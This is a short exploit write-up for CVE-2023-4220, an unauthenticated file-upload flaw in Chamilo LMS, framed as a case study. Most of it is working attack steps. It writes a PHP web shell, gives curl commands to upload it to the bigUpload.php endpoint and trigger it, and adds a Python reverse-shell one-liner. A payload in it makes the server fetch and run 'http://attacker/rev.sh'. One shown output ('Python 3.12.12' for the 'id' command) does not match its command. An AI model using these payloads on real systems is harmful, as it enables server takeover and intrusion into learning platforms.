Case Study - CVE-2023-4220, Chamilo LMS Unauthenticated Big Upload File Remote Code Execution
intro
Unrestricted file upload in big file upload functionality in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.
how to exploit
- create a local file with payloads
echo '<?php system("id"); ?>' > test.php
- upload the file
> curl -F 'bigUploadFile=@test.php' 'http://target/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
- trigger the code
> curl 'http://target/main/inc/lib/javascript/bigupload/files/test.php'
Python 3.12.12
combined with reverse shell
- create a
rev.shfile
# rev.sh
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- create a file to upload
> echo '<?php system("curl http://attacker/rev.sh|bash"); ?>' > test.php
- upload
> curl -F 'bigUploadFile=@test.php' 'http://target/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
- trigger
> curl 'http://target/main/inc/lib/javascript/bigupload/files/test.php'